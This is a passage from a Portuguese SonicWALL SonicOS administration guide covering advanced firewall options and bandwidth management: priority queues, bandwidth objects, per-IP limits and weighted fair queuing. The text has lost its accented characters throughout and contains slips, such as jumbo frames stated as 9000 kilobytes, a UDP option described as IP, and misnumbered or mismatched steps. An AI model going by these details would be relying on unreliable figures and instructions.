C. A tabela de roteamento deve controlar o caminho que um pacote segue, de modo que
no seja substitudo pelo remetente ou um roteador downstream.
Conexes
A seo Conexes permite ajustar o firewall para dar prioridade a resultados ideais ou a um
maior nmero de conexes simultneas que so inspecionadas por servios de inspeo
profunda de pacotes (DPI). No h nenhuma alterao no nvel de proteo de segurana
fornecido por uma das configuraes de conexes DPI abaixo.
Mximo de conexes SPI (servios DPI desabilitados) essa opo no fornece
proteo de servios de segurana de DPI da SonicWALL e otimiza o firewall para o
nmero mximo de conexes com apenas uma inspeo de pacotes estvel habilitada.
Esta opo deve ser usada por redes que precisam somente de inspeo de pacotes
estvel, o que no recomendvel para a maioria das implantaes de dispositivos de
segurana de rede Dell SonicWALL.
Mximo de conexes DPI (servios DPI habilitados) esta a configurao padro
recomendada para a maioria das implantaes de dispositivos de segurana de rede Dell
SonicWALL.
Conexes DPI (servios DPI habilitados com otimizao de desempenho adicionais)
essa opo destina-se a implantaes crticas de desempenho. Esta opo negocia o
nmero de conexes mximas de DPI para um melhor resultado de inspeo de DPI de
firewall. Opes do servio de regras de acesso
Forar conexes de dados FTP de entrada e sada a utilizar a porta padro 20 a
configurao padro permite conexes de FTP da porta 20, mas remapeia trfego de sada
para uma porta como 1024. Se esta caixa de seleo estiver marcada, qualquer conexo
de dados FTP por meio do dispositivo de segurana dever ser proveniente da porta 20 ou
a conexo ser descartada. O evento ento registrado como um evento de log no
dispositivo de segurana.
Aplicar regras de firewall para o trfego intra-LAN para a/da mesma interface aplica
regras de firewall recebido em uma interface LAN e que se destina mesma interface LAN.
Em geral, isso s ser necessrio se estiverem configuradas sub-redes LAN secundrias.

Opes de regras de acesso
Forar conexes de dados FTP de entrada e sada a utilizar a porta padro: 20

Aplicar regras de firewall para o trfego intra-LAN para a/da mesma interface
Imposio de soma de verificao de IP e UDP

Habilitar imposio de soma de verificao de cabealhos IP selecione esta opo
para impor somas de verificao de cabealhos IP.
Habilitar imposio de soma de verificao de UDP selecione esta opo para impor
somas de verificao de cabealhos IP.
Quadro Jumbo
Habilitar suporte ao quadro Jumbo habilitar essa opo aumenta a velocidade de
processamento e reduz o nmero de quadros Ethernet que sero processados. Em alguns
casos, o aumento da velocidade de processamento no pode ser observado. No entanto,
haver alguma melhora na velocidade de processamento se a travessia de pacotes for
realmente de tamanho jumbo.
Nota Os pacotes do quadro Jumbo tm 9000 quilobytes de tamanho e aumentam os requisitos

de memria por um fator de 4.

Configuraes avanadas de IPv6
Descartar pacotes do tipo 0 do cabealho de roteamento IPv6 selecione esta opo

para prevenir um possvel ataque de DoS que explora pacotes do tipo 0 do cabealho de
roteamento (RH0) de IPv6. Quando esta configurao est habilitada, os pacotes RH0 so
descartados, exceto se o destino dos mesmos for o dispositivo de segurana Dell
SonicWALL e o valor de segmentos restantes for 0. O campo Segmentos restantes
especifica o nmero de segmentos de rota que restam at chegar ao destino final.
Reduzir o limite hop IPv6 para trfego encaminhado
Soltar e registrar os pacotes de rede cujo endereo de origem ou de destino esteja
reservado pela RFC
Nunca gerar pacotes ICMP IPv6 de tempo excedido
Nunca gerar pacotes de destino inalcanvel ICMP IPv6
Nunca gerar pacotes de redirecionamento ICMP IPv6
Nunca gerar pacotes de problemas de parmetros ICMP IPv6
Habilitar a resposta de consulta do nome NetBIOS para ISATAP
O nome ISATAP resolvido vlido por (segundos)

Captulo 44
Configurar gerenciamento de largura de
banda
Configuraes de firewall > BWM

O gerenciamento de largura de banda (BWM) um meio de alocao de recursos de largura
de banda a aplicativos crticos em uma rede.
O SonicOS oferece um mecanismo de formatao de trfego integrado atravs de suas
interfaces de BWM de sada (egresso) e entrada (ingresso). O BWM de egresso pode ser
aplicado ao trfego com origem em zonas pblicas e confiveis que se deslocam para zonas
no confiveis e criptografadas. O BWM de ingresso pode ser aplicado ao trfego com origem
em zonas no confiveis e criptografadas que se deslocam para zonas confiveis e pblicas.
Compreender o gerenciamento de largura de banda na pgina 678
Configurar a pgina Configuraes de firewall > BWM na pgina 679
Gerenciamento avanado da largura de banda na pgina 693
Configurar o gerenciamento de largura de banda avanado na pgina 697
Atualizar o gerenciamento avanado da largura de banda na pgina 704
Nota Embora o BWM seja um sistema de qualidade de servio (QoS) totalmente integrado, no
qual so realizadas classificao e formatao em um nico dispositivo SonicWALL,
dispensando efetivamente a dependncia de sistemas externos e, assim, evitando a
necessidade de marcao, possvel definir simultaneamente as configuraes de BWM e
QoS (marcao de camada 2 e/ou camada 3) em uma nica regra de acesso. Isso permite
que os sistemas externos aproveitem a classificao executada no firewall mesmo depois
de ela j ter formatado o trfego. Para obter detalhes sobre QoS de BWM, consulte
Configurar gerenciamento de largura de banda | 677

Compreender o gerenciamento de largura de banda
O dispositivo de segurana de rede Dell SonicWALL utiliza o BWM para controlar o trfego de
ingresso e egresso. O BWM permite que os administradores de rede assegurem o mnimo de
largura de banda e atribuam prioridade ao trfego baseado em regras de acesso criadas na
pgina Firewall > Regras de acesso da interface de gerenciamento. Controlando a
quantidade de largura de banda para um aplicativo ou usurio, o administrador de rede pode
impedir que um pequeno nmero de aplicativos ou usurios consuma toda a largura de banda
disponvel. O balanceamento da largura de banda alocada a trfego de rede diferente e a
atribuio de prioridades ao trfego podem melhorar o desempenho da rede.
O SonicOS oferece oito filas de prioridade da seguinte forma:
0 Tempo real
1 Mais alta
2 Alta
3 Mdia alta
4 Mdia
5 Mdia baixa
6 Baixa
7 Mais baixa
Trs tipos de gerenciamento de largura de banda esto disponveis e podem ser habilitados
na pgina Configuraes de firewall > BWM:
Tipo de BWM Descrio

Gerenciamento Habilita o gerenciamento avanado da largura de banda. Os limites mximos de
avanado largura de banda de egresso e ingresso podem ser configurados em qualquer
interface, por interface, configurando objetos de largura de banda, regras de
acesso e polticas de aplicativo, bem como associando os mesmos interface.
Global (Padro) Todas as zonas podem ter largura de banda garantida e mxima
atribuda a servios e ter trfego com prioridade. Quando o BWM global est
habilitado em uma interface, todo o trfego para e dessa interface gerenciado por
largura de banda.
Filas de BWM global padro:
2 Alto
4 Mdia
6 Baixo
Mdia a prioridade padro para todo o trfego que no gerenciado por uma
Regra de acesso ou uma Poltica de controle de aplicativos que seja habilitada
para o BWM.
Nenhuma Desabilita o BWM.
Quando o gerenciamento de largura de banda Global est habilitado em uma interface, todo
o trfego para e dessa interface gerenciado por largura de banda. Se o tipo de gerenciamento
de largura de banda for Nenhum, existirem trs tipos de trfego usando uma interface e a
capacidade de link da interface for 100 Mbps, a capacidade cumulativa para os trs tipos de
trfego ser 100 Mbps.
Se o tipo de gerenciamento de largura de banda for Global e o trfego de entrada e sada
disponvel estiver configurado para 10 Mbps, ento por padro todos os trs tipos de trfego
sero enviados para a fila de prioridade mdia. A fila de prioridade mdia, por padro, tem uma
largura de banda garantida de 50% e uma largura de banda mxima de 100%. Se nenhuma
poltica de gerenciamento de largura de banda Global estiver configurada, a capacidade de
link cumulativa para cada tipo de trfego de 10 Mbps.

Nota Cada regra de BWM consome memria de enfileiramento de pacotes, por isso o nmero de
regras e pacotes enfileirados permitidos no SonicOS est limitado por plataforma (os
valores esto sujeitos a alterao).
Configurar a pgina Configuraes de firewall > BWM

O BWM funciona por meio da habilitao do gerenciamento de largura de banda, em primeiro
lugar, na pgina Configuraes de firewall > BWM, habilitando o BWM em uma interface/
firewall/regra de aplicativo e, em seguida, alocando a largura de banda disponvel a essa
interface no trfego de entrada e sada. Ele atribui em seguida limites individuais para cada
classe de trfego de rede. Ao atribuir prioridades ao trfego de rede, os aplicativos que exigem
um tempo de resposta rpido, como o Telnet, podem ter precedncia relativamente ao trfego
que exige um tempo de resposta menor, como o FTP.
Para exibir a configurao do BWM, acesse a pgina Configuraes de firewall > BWM.
Esta pgina composta pelas seguintes entidades:

Opo Tipo de gerenciamento de largura de banda:
Avanado qualquer zona pode ter largura de banda garantida e mxima e dar
prioridade a trfego atribudo por interface.
Global todas as zonas podem ter largura de banda garantida e mxima atribuda a
servios e ter trfego com prioridade.
Nenhum desabilita o BWM.
Coluna Prioridade exibe o nmero e o nome da prioridade.
Caixa de seleo Habilitar quando est marcada, a fila de prioridade habilitada.

Campo de texto Garantido e mximo/estouro habilita as taxas garantidas e mximas/
estouro. A caixa de seleo Habilitar correspondente deve estar marcada para que a taxa
tenha efeito. Essas taxas so identificadas como uma porcentagem. A largura de banda
configurada em uma interface usada ao calcular o valor absoluto. A soma de toda a
largura de banda garantida no deve exceder 100% e a largura de banda garantida no
deve ser superior largura de banda mxima por fila.
Nota Ao alterar o Tipo de gerenciamento de largura de banda de Global para Avanado, as

aes padro do BWM que estiverem sendo usadas em quaisquer polticas de Regras de
aplicativo sero automaticamente convertidas para as definies de BWM avanado. Ao
alterar o Tipo de Avanado para Global, as aes padro do BWM sero convertidas para
BWM Global-Mdio. O firewall no armazena os seus nveis de prioridade de ao
anteriores ao alternar o Tipo. possvel exibir as converses na pgina Firewall > Regras
de aplicativo.
Nota As configuraes padro desta pgina consistem em trs prioridades com largura de banda
pr-configurada garantida e mxima. A prioridade mdia tem o valor garantido mais alto,
pois esta fila de prioridade usada por padro para todo o trfego no controlado por uma
poltica habilitada por BWM.
Nota Os padres so definidos pela SonicWALL para permitir uma utilizao fcil do BWM.
recomendvel que voc revise as necessidades especficas de largura de banda e digite os
valores nesta pgina em conformidade.
Objetos de ao
Os objetos de ao definem como a poltica de regras de aplicativo reage a eventos de
correspondncia. Voc pode personalizar uma ao ou selecionar uma das aes padro
predefinidas. As aes predefinidas so exibidas na pgina Configuraes de poltica de
controle de aplicativos quando voc adiciona ou edita uma poltica na pgina Regras de
aplicativos.
As aes de BWM personalizadas comportam-se de maneira diferente em relao s aes
de BWM padro. As aes de BWM personalizadas so configuradas ao adicionar um novo
objeto de ao na pgina Firewall > Objetos de ao e ao selecionar o tipo de ao
Gerenciamento de largura de banda. As aes e polticas de BWM personalizadas que os
usam mantm a respectiva configurao de nvel de prioridade quando tipo de gerenciamento
de largura de banda alterado de Global para Avanado e de Avanado para Global.
gerenciamento de largura de banda na pgina Configuraes de firewall > BWM. Se o tipo
de gerenciamento de largura de banda estiver definido para Global, os oito nveis de BWM

esto disponveis. Se o tipo de gerenciamento de largura de banda estiver configurado para
Avanado, no definida qualquer prioridade. As prioridades so definidas configurando um
objeto de largura de banda em Firewall > Objetos de largura de banda.
A tabela seguinte lista as aes padro predefinidas que esto disponveis ao adicionar uma
poltica.
Se tipo de BWM = Global Se tipo de BWM = Avanado

BWM Global em tempo real BWM avanado alto
BWM Global mais alto BWM avanado mdio
BWM Global alto BWM avanado baixo
BWM Global mdio/alto
BWM Global mdio
BWM Global mdio/baixo
BWM Global baixo
BWM Global mais baixo
Gerenciamento de largura de banda global

O Gerenciamento de largura de banda global pode ser configurado usando os seguintes
mtodos:
Configurando o Gerenciamento de largura de banda global na pgina 682
Configurar BWM global em uma interface na pgina 683
Configurar BWM em uma regra de acesso na pgina 684
Configurar BWM em um objeto de ao na pgina 686
Configurar regras de aplicativos na pgina 687
Configurar o monitor de App Flow na pgina 689
Configuraes da largura de banda elementar na pgina 695
Gerenciamento de largura de banda sem zonas na pgina 695
Enfileiramento razovel ponderado na pgina 695
Habilitar o gerenciamento avanado da largura de banda na pgina 697
Configurar polticas de largura de banda na pgina 698
Definir limites de largura de banda de uma interface na pgina 703

Configurando o Gerenciamento de largura de banda global
Para definir o tipo de Gerenciamento de largura de banda para Global:
Etapa 1 No dispositivo de segurana Dell SonicWall, acesse Configuraes de firewall > BWM.
Etapa 2 Defina a opo Tipo de gerenciamento de largura de banda para Global.
Etapa 3 Habilite as prioridades que voc deseja marcando as caixas de seleo apropriadas na coluna
Habilitar.
Nota Voc deve habilitar as prioridades nesta caixa de dilogo para poder configurar as mesmas
em Regras de acesso, Regras de aplicativos e Objetos de ao.
Etapa 4 Insira a porcentagem de largura de banda Garantida que voc deseja para cada prioridade
selecionada.
Etapa 5 Insira a porcentagem de largura de banda Mxima/Estouro que voc deseja para cada
prioridade selecionada.

Configurar BWM global em uma interface
Para configurar BWM global em uma interface:
Etapa 1 No dispositivo de segurana Dell SonicWall, acesse Rede > Interfaces.

Etapa 2 Clique no boto Configurar da interface apropriada.
Etapa 4 Em Gerenciamento de largura de banda, selecione a opo Habilitar o limite de largura de

banda egressa da interface.
Etapa 5 Quando esta opo estiver selecionada, o trfego de egresso total na interface estar limitado ao valor
especificado na caixa Habilitar o limite de largura de banda ingressa da interface. Quando esta
opo no estiver selecionada, no ser definido um limite de largura de banda ao nvel da interface,
mas o trfego de egresso ainda pode ser formatado usando outras opes.
Etapa 6 Na caixa Largura de banda egressa mxima da interface (kbps), insira a largura de banda
egressa mxima da interface (em quilobytes por segundo).
Etapa 7 Selecione a opo Habilitar o limite de largura de banda ingressa da interface.
Etapa 8 Quando esta opo estiver selecionada, o trfego de ingresso total estar limitado ao valor
especificado na caixa Largura de banda ingressa mxima da interface. Quando esta opo
no estiver selecionada, no ser definido um limite de largura de banda ao nvel da interface,
mas o trfego de ingresso ainda pode ser formatado usando outras opes.

Etapa 9 Na caixa Largura de banda ingressa mxima da interface (kbps), insira a largura de banda
ingressa mxima da interface (em quilobytes por segundo).
Configurar BWM em uma regra de acesso

Voc pode configurar o BWM para cada regra de acesso. Este mtodo configura a direo para
aplicar o BWM e define a fila de prioridade.
Nota Para que seja possvel configurar todas as prioridades em uma regra de acesso, voc deve
primeiro habilitar as prioridades que deseja usar na pgina Configuraes de firewall >
BWM. Consulte a pgina Configuraes de firewall > BWM para determinar quais as
prioridades habilitadas. Se voc selecionar uma prioridade de largura de banda que no
est habilitada na pgina Configuraes de firewall > BWM, o trfego ser
automaticamente mapeado para o nvel 4 de prioridade (Mdio). Consulte Configurando o
Gerenciamento de largura de banda global na pgina 682.
As prioridades encontram-se na lista Prioridade da largura de banda da caixa de dilogo

Regras de acesso da seguinte forma:
0 Tempo real
1 Mais alta
2 Alta
3 Mdia alta
4 Mdia
5 Mdia baixa
6 Baixa
7 Mais baixa

Para configurar o BWM em uma regra de acesso:
Etapa 1 Navegue at a pgina Firewall > Regras de acesso.

Etapa 2 Clique no cone Configurar da regra que voc deseja editar.
A caixa de dilogo Editar regra > guia Geral exibida.
Etapa 3 Clique na guia BWM.
Etapa 4 Selecione a opo Habilitar o gerenciamento de largura da banda egressa (somente

regras "Permitir").
Etapa 5 Selecione a prioridade de egresso apropriada na lista Prioridade da largura de banda.
Etapa 6 Selecione a opo Habilitar o gerenciamento de largura de banda ingressa (somente
regras "Permitir").
Etapa 7 Selecione a prioridade de entrada adequada na lista Prioridade de largura de banda.

Configurar BWM em um objeto de ao
Se voc no quiser usar as aes ou polticas de BWM global predefinidas, pode optar por criar
uma nova que atenda suas necessidades.
Para criar um novo objeto de ao de BWM para gerenciamento de largura de banda global,
execute as seguintes etapas:
Etapa 1 Navegue at a pgina Firewall > Objetos de ao.

Etapa 2 Clique em Adicionar novo objeto de ao na parte inferior da pgina.
A caixa de dilogo Configuraes do objeto de ao exibida.
Etapa 3 No campo Nome da ao, digite um nome para o objeto de ao.

Etapa 4 Na lista Ao, selecione Gerenciamento de largura de banda.
Etapa 5 Selecione a opo Habilitar o gerenciamento de largura da banda egressa.
Etapa 6 Na lista Prioridade da largura de banda, selecione a prioridade de egresso que deseja.
Etapa 7 Selecione a opo Habilitar o gerenciamento de largura da banda ingressa.
Etapa 8 Na lista Prioridade da largura de banda, selecione a prioridade de ingresso que deseja.

Configurar regras de aplicativos
A configurao do BWM em uma regra de aplicativo permite-lhe criar polticas que controlam
o consumo de largura de banda por tipos especficos de arquivos dentro de um protocolo e, ao
mesmo tempo, permitem que outros tipos de arquivos usem a largura de banda ilimitada. Isso
permite que voc faa distino entre o trfego desejvel e indesejvel no mesmo protocolo.
O BWM de regra de aplicativo suporta os seguintes Tipos de poltica:
Cliente SMTP
Cliente HTTP
Servidor HTTP
Cliente FTP
Carregamento de arquivo de cliente FTP
Download de arquivo de cliente FTP
Transferncia de dados de FTP
Cliente POP3
Servidor POP3
Poltica personalizada
Contedo do IPS
Contedo do controle de aplicativos
CFS
Nota Primeiro, voc deve habilitar o BWM da seguinte forma para que possa configurar o BWM
em uma Regra de aplicativo.
Antes de configurar o BWM em uma regra de aplicativo:
Etapa 1 Habilite as prioridades que voc pretende usar em Configuraes de firewall > BWM.
Consulte Configurando o Gerenciamento de largura de banda global na pgina 682.
Etapa 2 Habilite o BWM em um Objeto de ao. Consulte Configurar BWM em um objeto de ao na
pgina 686
Etapa 3 Configure o BWM na Interface. Consulte Configurar BWM global em uma interface na
pgina 683, respectivamente.

Para configurar o BWM em uma regra de aplicativo:
Etapa 1 Navegue at a pgina Firewall > Regras de aplicativos.
Etapa 2 Em Polticas de regras de aplicativos, na linha Cabealho, clique em Ao.

A pgina ir ordenar por tipo de Ao.

Etapa 3 Clique no cone Configurar na coluna Configurar da poltica que voc deseja configurar.
A caixa de dilogo Configuraes da poltica de controle de aplicativos exibida.
a. Na lista Objeto de ao, selecione a ao de BWM que voc desejar.

b. Clique em OK.
Configurar o monitor de App Flow

O BWM tambm pode ser configurado na pgina Monitor de App Flow selecionando um
aplicativo de tipo de servio ou um aplicativo de tipo de assinatura e, em seguida, clicando no
boto Criar regra. As opes de gerenciamento de largura de banda disponveis dependem

dos nveis de prioridade habilitados na tabela da fila de prioridade Global na pgina
Configuraes de firewall > BWM. Os nveis de prioridade habilitados por padro so Alto,
Mdio ou Baixo.
Nota Voc deve ter o Dell SonicWALL Application Visualization habilitado antes de continuar.
Para configurar o BWM usando o monitor de App Flow, execute as seguintes etapas:
Etapa 1 V at a pgina Painel > Monitor de App Flow.
Etapa 2 Marque os aplicativos baseados em servio e os aplicativos baseados em assinatura aos quais
deseja aplicar o BWM global.
Nota Os aplicativos gerais no podem ser selecionados. Os aplicativos com base em servio e
os aplicativos com base em assinatura no podem ser misturados em uma nica regra.

Nota A criao de uma regra para aplicativos baseados em servio resultar na criao de uma
regra de acesso de firewall e a criao de uma regra para aplicativos com base em
assinatura criar uma poltica de controle de aplicativos.
Etapa 3 Clique em Criar regra.

O pop-up Criar regra exibido.
Opes de aplicativo baseado em Opes de aplicativos baseados em

servio assinatura
Etapa 4 Selecione o boto de opo Gerenciamento de largura de banda e, em seguida, selecione

uma prioridade de BWM global.

Etapa 5 Clique em Criar regra.
Um pop-up de confirmao exibido.
Aplicativo baseado em servio Aplicativos baseados em assinatura

bem-sucedido bem-sucedidos

Etapa 7 Navegue at a pgina Firewall > Regras de acesso (para aplicativos baseados em servio) e
Firewall > Regras de aplicativos (para aplicativos baseados em assinatura) para verificar se
a regra foi criada.
Nota Para aplicativos baseados em servio, a nova regra identificada com uma tacha na coluna
Comentrios e um prefixo na coluna Servio de coluna de ~servios=<nome do servio>.
Por exemplo, ~servios=NTP&t=1306361297.
Nota Para aplicativos baseados em assinatura, a nova regra identificada com um prefixo,
~BWM_Global-<priority>=~catname=<app_name> na coluna Nome e na coluna Objeto o
prefixo ~catname=<app_name>.

Gerenciamento avanado da largura de banda
O gerenciamento avanado de largura de banda permite que os administradores gerenciem
classes especficas de trfego com base nas configuraes de prioridade e largura de banda
mxima. O gerenciamento avanado de largura de banda composto por trs componentes
principais:
Classificador classifica os pacotes que passam pelo firewall de acordo com a classe de
trfego apropriada.
Avaliador estima e calcula a largura de banda usada por uma classe de trfego durante
um intervalo de tempo para determinar se essa classe de trfego tem largura de banda
disponvel.
Agendador agenda a transmisso de trfego com base no status da largura de banda
da classe de trfego indicado pelo avaliador.
Este grfico ilustra os conceitos bsicos do gerenciamento avanado de largura de banda.
A configurao do gerenciamento de largura de banda baseada em polticas que especificam

as limitaes de largura de banda para classes de trfego. Uma poltica completa de largura
de banda inclui duas partes: um classificador e uma regra de largura de banda.
Uma regra da largura de banda especifica os parmetros reais, como prioridade, largura de
banda garantida e largura de banda mxima, e configurada em um objeto de largura de
banda. As regras da largura de banda identificam e organizam pacotes em classes de trfego,
correspondendo a critrios especficos.
Um classificador uma regra de acesso ou uma regra de aplicativo na qual um objeto da
largura de banda est habilitado. As regras de acesso e as regras de aplicativo so
configuradas para interfaces especficas ou zonas de interfaces.
A primeiro etapa no gerenciamento de largura de banda que todos os pacotes que so
transmitidos pelo firewall do SonicOS recebam um classificador (rtulo de classe). Os
classificadores identificam pacotes como pertencendo a uma classe de trfego especfica. Os
pacotes classificados so ento transmitidos para o mecanismo do BWM pelo policiamento e
modelagem. O SonicOS usa dois tipos de classificadores:
Regras de acesso

A tabela a seguir mostra os parmetros que so configurados em um objeto de largura de
banda.
Nome Descrio
Largura de banda garantida A largura de banda que estar garantidamente disponvel para uma
classe de trfego especfica.
Largura de banda mxima A largura de banda mxima que uma classe de trfego pode usar.
Prioridade de trfego A prioridade da classe de trfego.
0 prioridade mais alta
7 prioridade mais baixa
Ao de violao A ao de firewall que ocorre quando o trfego excede a largura de
banda mxima.
Atrasar os pacotes so enfileirados e enviados quando for possvel.
Descartar os pacotes so imediatamente descartados.
Depois de os pacotes serem identificados com uma classe de trfego especfica, o mecanismo
de BWM rene-os para processamento das polticas e da formatao com base nas
configuraes da largura de banda que foram definidas em um objeto de largura de banda,
habilitado em uma regra de acesso e associado a regras de aplicativos.
Os classificadores tambm identificam a direo dos pacotes no fluxo de trfego. Os
classificadores podem ser definidos para as direes de egresso, ingresso ou ambas. Para o
gerenciamento da largura de banda, os termos ingresso e egresso so definidos da seguinte
forma:
Ingresso trfego do iniciador para o respondente em um fluxo de trfego em particular.
Egresso trfego do respondente para o iniciador em um fluxo de trfego em particular.
Por exemplo, um cliente por detrs da interface X0 tem uma conexo com um servidor que est
por detrs da interface X1. A tabela a seguir mostra:
A direo do fluxo de trfego em cada direo para o cliente e servidor
A direo do trfego em cada interface
A direo indicada pelo classificador BWM
Direo do Direo da Direo da BWM

Fluxo de trfego Interface X0 Interface X1 Classificador
Cliente para Servidor Egresso Ingresso Egresso
Servidor para cliente Ingresso Egresso Ingresso
Para serem compatveis com as configuraes tradicionais de largura de banda em zonas

WAN, os termos entrada e sada ainda so aceitveis para definir a direo do trfego. Estes
termos s se aplicam a interfaces de zonas WAN ativas.
Sada trfego da zona LAN\DMZ para a zona WAN (Egresso).
Entrada trfego da zona WAN para a zona LAN\DMZ (Ingresso).

Configuraes da largura de banda elementar
O recurso Configuraes da largura de banda elementar permite que um objeto de largura de
banda seja aplicado a elementos individuais de uma classe de trfego pai. Configuraes da
largura de banda elementar uma subopo de Firewall > Objetos de largura de banda. A
tabela a seguir mostra os parmetros configurados em Configuraes de largura de banda
elementar.
Nome Descrio
Habilitar o gerenciamento de Quando habilitada, a configurao de largura de banda elementar
largura de banda por IP mxima aplica-se a cada endereo IP da classe de trfego pai.
Largura de banda mxima A largura de banda elementar mxima que pode ser alocada a um
endereo IP da classe de trfego pai.
A largura de banda elementar mxima no pode ser superior largura
de banda mxima da sua classe pai.
Ao habilitar o gerenciamento de largura de banda Per-IP, o endereo IP do iniciador usado

como a chave para identificar um fluxo de trfego elementar. O endereo IP do respondente
ignorado.
Gerenciamento de largura de banda sem zonas

O recurso de gerenciamento de largura de banda sem zonas habilita o gerenciamento de
largura de banda em todas as interfaces, independentemente das atribuies de zonas.
Anteriormente, o gerenciamento de largura de banda s era aplicado a estas zonas:
LAN\DMZ para WAN\VPN
WAN\VPN para LAN\DMZ
No SonicOS 6.2, o gerenciamento de largura de banda sem zonas pode ser executado em
todas as interfaces, independentemente da zona.
O gerenciamento de largura de banda sem zonas permite que os administradores configurem
o limite de largura de banda mxima de forma independente, na direo de ingresso, egresso
ou ambas, e apliquem o mesmo em quaisquer interfaces usando regras de acesso e regras de
aplicativos.
Nota O limite de largura de banda de interface s est disponvel em interfaces fsicas. A

configurao de failover e balanceamento de carga no afeta os limites de largura de banda
de interface.
Enfileiramento razovel ponderado

Tradicionalmente, o gerenciamento de largura de banda do SonicOS distribui o trfego por 8
filas com base na prioridade da classe de trfego dos pacotes. Estas 8 filas funcionam em
enfileiramento de prioridade estrita. Os pacotes com a prioridade mais alta so sempre
transmitidos primeiro.
O enfileiramento de prioridade estrita pode fazer com o que trfego de prioridade alta
monopolize toda a largura de banda disponvel em uma interface e o trfego de prioridade
baixa ficar, por conseguinte, preso na respectiva fila por tempo indeterminado. Com
enfileiramento de prioridade estrita, o agendador d sempre primazia s filas de prioridade
mais alta. Isso pode resultar em falta de largura de banda para as filas de prioridade mais
baixa.

O enfileiramento razovel ponderado (WFQ) alivia o problema da falta de largura de banda
tratando dos pacotes de cada fila por meio de repetio alternada, para que todas as filas
sejam servidas de forma justa dentro de um determinado intervalo de tempo. prestado mais
servio s filas de prioridade mais alta e menos servio s filas de prioridade mais baixa.
Nenhuma fila recebe todo o servio devido sua alta prioridade e nenhuma fila fica sem
servio devido sua prioridade baixa.
Por exemplo, a Classe A de trfego est configurada como Prioridade 1 com uma largura de
banda mxima de 400 kbps. A Classe B est configurada como Prioridade 3 com uma largura
de banda mxima de 600 kbps. Ambas as classes de trfego so enfileiradas em uma interface
que tem uma largura de banda mxima de apenas 500 kbps. Ambas as filas sero servidas
com base na respectiva prioridade em repetio alternada. Assim sendo, ambas as filas sero
servidas, mas a Classe A de trfego ser transmitida de forma mais rpida que a Classe B.
A tabela a seguir mostra a largura de banda formatada para cada intervalo de amostragem
consecutivo:
Classe A de trfego Classe B de trfego

Intervalo de Kbps de Kbps Kbps de Kbps
amostragem entrada formatados entrada formatados
1 500 380 500 120
2 500 350 500 150
3 400 300 800 200
4 600 400 400 100
5 200 180 600 320
6 200 200 250 250

Configurar o gerenciamento de largura de banda avanado
O gerenciamento de largura de banda avanado est configurado da seguinte forma:
Habilitar o gerenciamento avanado da largura de banda na pgina 697
Configurar polticas de largura de banda na pgina 698
Definir limites de largura de banda de uma interface na pgina 703
Habilitar o gerenciamento avanado da largura de banda

Para habilitar o gerenciamento avanado da largura de banda.:
Etapa 1 No dispositivo de segurana Dell SonicWall, acesse Configuraes de firewall > BWM.
Etapa 2 Defina a opo Tipo de gerenciamento de largura de banda para Avanado.
Nota Quando o BWM avanado est selecionado, os campos de prioridades so desabilitados e

no podem ser definidos aqui. No BWM avanado, as prioridades so definidas em polticas
de largura de banda. Consulte Configurar polticas de largura de banda na pgina 698.

Configurar polticas de largura de banda
As polticas de largura de banda so configuradas da seguinte forma:
Configurar um objeto de largura de banda na pgina 698
Habilitar o gerenciamento de largura de banda elementar na pgina 700
Habilitar um objeto de largura de banda em uma regra de acesso na pgina 701
Habilitar um objeto de largura de banda em um objeto de ao na pgina 702
Configurar um objeto de largura de banda
Para configurar um objeto de largura de banda:
Etapa 1 No Dispositivo de segurana Dell SonicWALL, v para Firewall > Objetos de largura de
banda.

Etapa 2 Clique no boto Adicionar para criar um novo Objeto de largura de banda.
ou
Clique no boto Configurar do objeto de largura de banda que voc deseja alterar.
Etapa 3 Clique na guia Geral.

Etapa 4 Na caixa Nome, digite um nome para este objeto de largura de banda.
Etapa 5 Na caixa Largura de banda garantida, digite a quantidade de largura de banda que este
objeto de largura de banda garantir fornecer a uma classe de trfego (em kbps ou Mbps).
Etapa 6 Na caixa Largura de banda mxima, digite a quantidade mxima de largura de banda que
este objeto de largura de banda fornecer a uma classe de trfego.
Etapa 7 A largura de banda realmente alocada pode ser inferior a este valor quando vrias classes de
trfego competem por uma largura de banda compartilhada.
Etapa 8 Na caixa Prioridade de trfego, digite a prioridade que este objeto de largura de banda
fornecer a uma classe de trfego. A prioridade mais alta 0. A prioridade mais reduzida 7.
Etapa 9 Quando vrias classes de trfego competem por largura de banda compartilhada, fornecida
precedncia s classes com prioridade mais elevada.
Etapa 10 Na caixa Ao de violao, digite a ao que este objeto de largura de banda fornecer
(atraso ou descarte) quando o trfego excede a configurao da largura de banda mxima.
Etapa 11 Atraso especifica que os pacotes de trfego em excesso sero enfileirados e enviados quando
for possvel.
Etapa 12 Descarte especifica que os pacotes de trfego em excesso sero descartados imediatamente.
Etapa 13 Na caixa Comentrio, digite um comentrio ou uma descrio para este objeto de largura de
banda.

Habilitar o gerenciamento de largura de banda elementar
O gerenciamento de largura de banda elementar permite que o SonicOS imponha regras e

polticas de largura de banda em cada IP individual que passa pelo firewall.
Para habilitar o gerenciamento de largura de banda elementar em um objeto de largura de
banda:
Etapa 1 No dispositivo de segurana SonicWall, v at Firewall > Objetos de largura de banda.

Etapa 2 Clique no boto Configurar para o objeto de largura de banda que deseja alterar.
Etapa 3 Clique na guia Elementar.

Etapa 4 Selecione a opo Habilitar o gerenciamento de largura de banda por IP.
Etapa 5 Quando habilitada, a configurao de largura de banda elementar mxima aplica-se a cada IP
individual da classe de trfego pai.
Etapa 6 Na caixa Largura de banda mxima, insira a largura de banda elementar mxima que pode
ser alocada a um protocolo da classe de trfego pai.

Habilitar um objeto de largura de banda em uma regra de acesso
Os objetos de largura de banda (e as respectivas configuraes) podem ser habilitados em

regras de acesso.
Para habilitar um objeto de largura de banda em uma regra de acesso:
Etapa 1 No dispositivo de segurana Dell SonicWall, v para Firewall > Regras de acesso.
Etapa 2 Clique no boto Adicionar para criar uma nova regra de acesso.
ou
Clique no boto Configurar da Regra de acesso apropriada.
Etapa 3 Clique na guia BWM.
Etapa 4 Para habilitar um objeto de largura de banda para a direo de egresso, em Gerenciamento
de largura de banda, selecione a caixa Habilitar o gerenciamento de largura de banda
egressa.
Etapa 5 Na lista Selecionar um objeto de largura de banda, selecione o objeto de largura de banda
que voc deseja para a direo de egresso.
Etapa 6 Para habilitar um objeto de largura de banda para a direo de ingresso, em Gerenciamento
de largura de banda, selecione a caixa Habilitar o gerenciamento de largura de banda
ingressa.
Etapa 7 Na lista Selecionar um objeto de largura de banda, selecione o objeto de largura de banda
que voc deseja para a direo de ingresso.
Etapa 8 Para habilitar o controle do uso da largura de banda, selecione a opo Habilitar uso do
controle da largura de banda.

